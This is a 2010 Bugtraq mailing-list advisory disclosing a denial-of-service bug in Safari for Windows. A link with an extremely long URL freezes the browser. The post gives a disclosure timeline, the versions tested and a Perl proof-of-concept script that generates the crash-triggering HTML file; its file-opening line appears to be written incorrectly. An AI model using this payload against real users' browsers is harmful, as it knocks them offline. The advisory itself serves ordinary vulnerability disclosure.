Bugtraqmailing list archives
Fwd: {Lostmon´s Group} Safari for windows Long link DoS
From: Lostmon lords <lostmon () gmail com>
Date: Wed, 4 Aug 2010 17:43:57 +0200
############################################Safari for windows Long link DoSVendor URL:http://www.apple.com/safari/Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.htmlVendor notified:Yes exploit available: YES############################################Safari is prone vulnerable to Dos with a very long Link...This issue is exploitable via web links like <a href="very long URL">click here</a> or similar vectors. Safari fails to render the linkand it turn Frozen resulting in a Denial of service condition.#################Versions Tested#################I have tested this issue in win xp sp3 and a windows 7 fully pached.Win XP sp3:Safari 5.0.X vulnerableSafari 4.xx vulnerablewindows 7 Ultimate:Safari 5.0.X vulnerableSafari 4.xx vulnerable############References############Discovered: 29-07-2010vendor notify:31-07-2010Vendor Response:Vendor patch:####################Proof Of Concept############################################################################################!/usr/bin/perl# safari & k-meleon Long "a href" Link DoS# Author: Lostmon Lords Lostmon () gmail comhttp://lostmon.blogspot.com# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS# generate the file open it with safari wait a seconds######################################################################$archivo = $ARGV[0];if(!defined($archivo)){print "Usage: $0 <archivo.html>\n";}$cabecera = "<html>" . "\n";$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x1028135 . "\">click here if you can :)</a>" . "\n";$fin = "</html>";$datos = $cabecera . $payload . $fin;open(FILE, '<' . $archivo);print FILE $datos;close(FILE);exit;################## EOF ####################################Related Links##############vendor bugtracker :http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251Posible related Vuln:https://bugzilla.mozilla.org/show_bug.cgi?id=583474Test Case :https://bugzilla.mozilla.org/attachment.cgi?id=461776###################### €nd #############################Thnx to Phreak for support and let me undestanding the nature of this bugthnx to jajoni for test it in windows 7 X64 bits version.atentamente:Lostmon (lostmon () gmail com)Web-Blog:http://lostmon.blogspot.com/Google group:http://groups.google.com/group/lostmon (new)--La curiosidad es lo que hace mover la mente...
Current thread:
- Fwd: {Lostmon´s Group} Safari for windows Long link DoSLostmon lords (Aug 04)